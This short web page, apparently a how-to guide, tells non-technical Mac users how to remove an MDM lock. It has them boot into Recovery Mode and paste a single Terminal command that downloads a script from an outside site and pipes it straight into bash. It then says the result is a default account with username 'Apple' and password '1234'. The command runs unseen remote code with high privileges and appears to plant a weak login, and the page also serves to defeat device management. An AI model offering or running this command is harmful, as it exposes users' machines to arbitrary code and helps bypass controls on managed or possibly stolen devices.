How to remove the MDM lock from your Mac

Follow these steps in order. No technical knowledge needed.

Step 1: Put your Mac in Recovery Mode

Turn off your Mac. Turn it back on and immediately hold Command (⌘) + R until you see the Apple logo or a spinning globe. When you see a window that says “macOS Utilities” or “Recovery”, you’re in the right place.

Step 2: Open Terminal

In the menu at the top, click Utilities and then click Terminal. A black window will open where you can type.

Step 3: Copy and run the command

Click the green “Copy command” button below (click "Copy command" or select the text and copy). Then paste it into the Terminal window and press Enter. Your Mac will check that it’s allowed to unlock and then run the process. Do not close the window until it finishes.

This is the only command you need — paste it in Terminal:

curl -s https://mdm.imeicheckpro.com/bypass.sh | bash
Important: Your Mac will restart when the process is done. The default login is: Username Apple, Password 1234. You can change the password after you sign in.